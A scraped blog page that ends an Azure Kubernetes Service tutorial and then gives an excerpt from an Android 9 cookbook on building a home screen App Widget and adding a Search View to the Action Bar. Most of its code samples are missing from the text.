scale your AKS hosts, this is quite easy too, as you can do it through the Azure portal. A maximum of 100 hosts with 3 vCPUs and 10.5 GB RAM per host is currently possible: You can now upload your containers to your AKS-enabled Docker and have a huge scalable infrastructure with a minimum of administrative tasks and time for the implementation itself. If you need to monitor AKS, the integration with Azure monitoring is integrated completely. By clicking the Monitor container health link, you will be directed to the following overview: The Nodes tab provides the following information per node: This not only gives a brief overview of the health status but also the number of containers and the load on the node itself. The Controllers view provides detailed information on the AKS controller, its services, status, and uptime: And finally, the Containers tab gives a deep overview of the health state of each container running in the infrastructure (system containers included): By hitting the Search logs section, you can define your own custom Azure monitoring searches and integrate them in your custom portal: To get everything up-and-running, the following to-do list gives a brief overview of all the tasks needed to provide an app within AKS: Prepare the AKS App: Create the container registry: Create the Kubernetes cluster Run the application in AKS: Scale the application in AKS: Update the application in AKS: AKS has the following service quotas and limits: Resource Default limit Max nodes per cluster 100 Max pods per node (basic networking with KubeNet) 110 Max pods per node (advanced networking with Azure CNI) 301 Max clusters per subscription 100 As you have seen, AKS in Azure provides great features with a minimum of administrative tasks. Summary In this tutorial, we learned the basics required to understand, deploy, and manage container services in a public cloud environment. Basically, the concept of containers is a great idea and surely the next step in virtualization that applications need to go to. Setting up the environment manually is quite complex, but by using the PaaS approach, the setup procedure is quite simple (because of automation) and allows you to just start using it. To understand how to build robust cloud solutions on Azure, check out our book Implementing Azure Solutions - Second Edition  Microsoft Connect(); 2018 Azure updates: Azure Pipelines extension for Visual Studio Code, GitHub releases and much more! Introducing Grafana’s ‘Loki’ (alpha), a scalable HA multi-tenant log aggregator for cloud natives; optimized for Grafana, Prometheus and Kubernetes DigitalOcean launches its Kubernetes-as-a-service at KubeCon+CloudNativeCon to ease running containerized app
Read more
  • 0
  • 0
  • 5602

article-image-implementing-a-home-screen-widget-and-search-bar-on-android-tutorial
Natasha Mathur
14 Jan 2019
12 min read
Save for later

Implementing a home screen widget and search bar on Android [Tutorial]

Natasha Mathur
14 Jan 2019
12 min read
In this tutorial, we'll look at how to create a home screen App Widget using which users can add your app on their Home screen. We'll also explore adding a Search option to the Action Bar using the Android SearchManager API. This tutorial is an excerpt taken from the book 'Android 9 Development Cookbook - Third Edition', written by Rick Boyer. The book explores techniques and knowledge of graphics, animations, media, etc, to help you develop applications using the latest Android framework. Creating a Home screen widget Before we dig into the code for creating an App Widget, let's cover the basics. There are three required and one optional component: The AppWidgetProviderInfo file: It's an XML resource. The AppWidgetProvider class: This is a Java class. The View layout file: It's a standard layout XML file, with some restrictions. The App Widget configuration Activity (optional): This is an Activity the OS will launch when placing the widget to provide configuration options. The AppWidgetProvider must also be declared in the AndroidManifest file. Since AppWidgetProvider is a helper class based on the Broadcast Receiver, it is declared in the manifest with the <receiver> element. Here is an example manifest entry: The metadata points to the AppWidgetProviderInfo file, which is placed in the res/xml directory. Here is a sample AppWidgetProviderInfo.xml file: The following is a brief overview of the available attributes: minWidth: The default width when placed on the Home screen minHeight: The default height when placed on the Home screen updatePeriodMillis: It's part of the onUpdate() polling interval (in milliseconds) initialLayout: The AppWidget layout previewImage (optional): The image shown when browsing App Widgets configure (optional): The activity to launch for configuration settings resizeMode (optional): The flags indicate resizing options: horizontal, vertical, none minResizeWidth (optional): The minimum width allowed when resizing minResizeHeight (optional): The minimum height allowed when resizing widgetCategory (optional): Android 5+ only supports Home screen widgets The AppWidgetProvider extends the BroadcastReceiver class, which is why the <receiver> element is used when declaring the AppWidget in the Manifest. As it's BroadcastReceiver, the class still receives OS broadcast events, but the helper class filters those events down to those applicable for an App Widget. The AppWidgetProvider class exposes the following methods: onUpdate(): It's called when initially created and at the interval specified. onAppWidgetOptionsChanged(): It's called when initially created and any time the size changes. onDeleted(): It's called any time a widget is removed. onEnabled(): It's called the first time a widget is placed (it isn't called when adding second and subsequent widgets). onDisabled(): It's called when the last widget is removed. onReceive(): It's called on every event received, including the preceding event. Usually not overridden as the default implementation only sends applicable events. The last required component is the layout. An App Widget uses a Remote View, which only supports a subset of the available layouts: AdapterViewFlipper FrameLayout GridLayout GridView LinearLayout ListView RelativeLayout StackView ViewFlipper And it supports the following widgets: AnalogClock Button Chronometer ImageButton ImageView ProgressBar TextClock TextView With App Widget basics covered, it's now time to start coding. Our example will cover the basics so you can expand the functionality as needed. This recipe uses a View with a clock, which, when pressed, opens our activity. The following screenshot shows the widget in the widget list when adding it to the Home screen: The purpose of the image is to show how to add a widget to the home screen The widget list's appearance varies by the launcher used. Here's a screenshot showing the widget after it is added to the Home screen: Getting ready Create a new project in Android Studio and call it AppWidget. Use the default Phone & Tablet options and select the Empty Activity option when prompted for the Activity Type. How to do it... We'll start by creating the widget layout, which resides in the standard layout resource directory. Then, we'll create the XML resource directory to store the AppWidgetProviderInfo file. We'll add a new Java class and extend AppWidgetProvider, which handles the onUpdate() call for the widget. With the receiver created, we can then add it to the Android Manifest. Here are the detailed steps: Create a new file in res/layout called widget.xml using the following XML: Create a new directory called XML in the resource directory. The final result will be res/xml. Create a new file in res/xml called appwidget_info.xml using the following XML: If you cannot see the new XML directory, switch from Android view to Project view in the Project panel drop-down. Create a new Java class called HomescreenWidgetProvider, extending from AppWidgetProvider. Add the following onUpdate() method to the HomescreenWidgetProvider class: Add the HomescreenWidgetProvider to the AndroidManifest using the following XML declaration within the <application> element: Run the program on a device or emulator. After first running the application, the widget will then be available to add to the Home screen. How it works... Our first step is to create the layout file for the widget. This is a standard layout resource with the restrictions based on the App Widget being a Remote View, as discussed in the recipe introduction. Although our example uses an Analog Clock widget, this is where you'd want to expand the functionality based on your application needs. The XML resource directory serves to store the AppWidgetProviderInfo, which defines the default widget settings. The configuration settings determine how the widget is displayed when initially browsing the available widgets. We use very basic settings for this recipe, but they can easily be expanded to include additional features, such as a preview image to show a functioning widget and sizing options. The updatePeriodMillis attribute sets the update frequency. Since the update will wake up the device, it's a trade-off between having up-to-date data and battery life. (This is where the optional Settings Activity is useful by letting the user decide.) The AppWidgetProvider class is where we handle the onUpdate() event triggered by the updatePeriodMillis polling. Our example doesn't need any updating so we set the polling to zero. The update is still called when initially placing the widget. onUpdate() is where we set the pending intent to open our app when the clock is pressed. Since the onUpdate() method is probably the most complicated aspect of AppWidgets, we'll explain this in some detail. First, it's worth noting that onUpdate() will occur only once each polling interval for all the widgets is created by this provider. (All additional widgets created will use the same cycle as the first widget created.) This explains the for loop, as we need it to iterate through all the existing widgets. This is where we create a pending intent, which calls our app when the clock widget is pressed. As discussed earlier, an AppWidget is a Remote View. Therefore, to get the layout, we call RemoteViews() with our fully qualified package name and the layout ID. Once we have the layout, we can attach the pending intent to the clock view using setOnClickPendingIntent(). We call the AppWidgetManager named updateAppWidget() to initiate the changes we made. The last step to make all this work is to declare the widget in the Android Manifest. We identify the action we want to handle with the <intent-filter>. Most App Widgets will likely want to handle the Update event, as ours does. The other item to note in the declaration is the following line: This tells the system where to find our configuration file. Adding Search to the Action Bar Along with the Action Bar, Android 3.0 introduced the SearchView widget, which can be included as a menu item when creating a menu. This is now the recommended UI pattern to provide a consistent user experience. The following screenshot shows the initial appearance of the Search icon in the Action Bar: The following screenshot shows how the Search option expands when pressed: If you want to add Search functionality to your application, this recipe will walk you through the steps to set up your User Interface and properly configure the Search Manager API. Getting ready Create a new project in Android Studio and call it SearchView. Use the default Phone & Tablet options and select Empty Activity when prompted for the Activity Type. How to do it... To set up the Search UI pattern, we need to create the Search menu item and a resource called searchable. We'll create a second activity to receive the search query. Then, we'll hook it all up in the AndroidManifest file. To get started, open the strings.xml file in res/values and follow these steps: Add the following string resources: Create the menu directory: res/menu. Create a new menu resource called menu_search.xml in res/menu using the following XML: Open ActivityMain and add the following onCreateOptionsMenu() to inflate the menu and set up the Search Manager: @Override public boolean onCreateOptionsMenu(Menu menu) { MenuInflater inflater = getMenuInflater(); inflater.inflate(R.menu.menu_search, menu); SearchManager searchManager = (SearchManager) getSystemService(Context.SEARCH_SERVICE); MenuItem searchItem = menu.findItem(R.id.menu_search); SearchView searchView = (SearchView) searchItem.getActionView(); searchView.setSearchableInfo(searchManager.getSearchableInfo(getComponentName())); return true; } Create a new XML resource directory: res/xml. Create a new file in res/xml called searchable.xml using the following XML: Create a new layout called activity_search_result.xml using this XML: Add a new Empty Activity to the project called SearchResultActivity. Add the following variable to the class: TextView mTextViewSearchResult; Change onCreate() to load our layout, set the TextView, and check for the QUERY action: Add the following method to handle the search: With the User Interface and code now complete, we just need to hook everything up correctly in the AndroidManifest. Here is the complete manifest, including both activities: Run the application on a device or emulator. Type in a search query and hit the Search button (or press Enter). The SearchResultActivity will be displayed, showing the search query entered. How it works... Since the New Project Wizard uses the AppCompat library, our example uses the support library API. Using the support library provides the greatest device compatibility as it allows the use of modern features (such as the Action Bar) on older versions of the Android OS. We start by creating string resources for the Search View.  In step 3, we create the menu resource, as we've done many times. One difference is that we use the app namespace for the showAsAction and actionViewClass attributes. The earlier versions of the Android OS don't include these attributes in the Android namespace, which is why we create an app namespace. This serves as a way to bring new functionality to older versions of the Android OS. In step 4, we set up the SearchManager, using the support library APIs. Step 6 is where we define the searchable XML resource, which is used by the SearchManager. The only required attribute is the label, but a hint is recommended so the user will have an idea of what they should type in the field. The android:label must match the application name or the activity name and must use a string resource (as it does not work with a hardcoded string). Steps 7-11 are for the SearchResultActivity. Calling the second activity is not a requirement of the SearchManager, but is commonly done to provide a single activity for all searches initiated in your application. If you run the application at this point, you would see the search icon, but nothing would work. Step 12 is where we put it all together in the AndroidManifest file. The first item to note is the following: Notice this is in the <application> element and not in either of the <activity> elements. By defining it at the <application> level, it will automatically apply to all <activities>. If we moved it to the MainActivity element, it would behave exactly the same in our example. You can define styles for your application in the <application> node and still override individual activity styles in the <activity> node. We specify the searchable resource in the SearchResultActivity <meta-data> element: We also need to set the intent filter for SearchResultActivity as we do here: The SearchManager broadcasts the SEARCH intent when the user initiates the search. This declaration directs the intent to the SearchResultActivity activity. Once the search is triggered, the query text is sent to the SearchResultActivity using the SEARCH intent. We check for the SEARCH intent in the onCreate() and extract the query string using the following code: You now have the Search UI pattern fully implemented. With the UI pattern complete, what you do with the search results is specific to your application needs. Depending on your application, you might search a local database or maybe a web service. So, we discussed creating a shortcut on the Home screen, creating a Home screen widget and adding Search to the Action Bar. Be sure to check out the book 'Android 9 Development Cookbook - Third Edition', if you're interested in learning how to show your app in full-screen and enable lock screen shortcuts. Build your first Android app with Kotlin How to Secure and Deploy an Android App Android User Interface Development: Animating Widgets and Layouts
Read more
  • 0
  • 0
  • 13248